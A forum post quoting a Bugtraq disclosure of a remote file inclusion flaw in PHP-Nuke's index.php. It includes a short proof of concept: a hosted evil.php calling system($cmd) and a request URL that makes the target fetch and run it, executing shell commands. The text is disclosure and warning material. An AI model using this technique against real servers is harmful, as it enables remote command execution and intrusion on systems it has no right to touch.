Quote"
From Bugtraq, by Handle Nopman [nopman@hackermail.com]
Hi All!
I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering
http://-urlsRemember the PHP's remote get feature...
How to exploit:
Upload this file to some free web space provider or
setup your own server:
system($cmd);
?>
Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-alwill execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.
Sincrely
"Nopman"
" unquote
Don't want to scare you in any way, but sounds interesting enough to investigate i think. Just to let you know.
HFW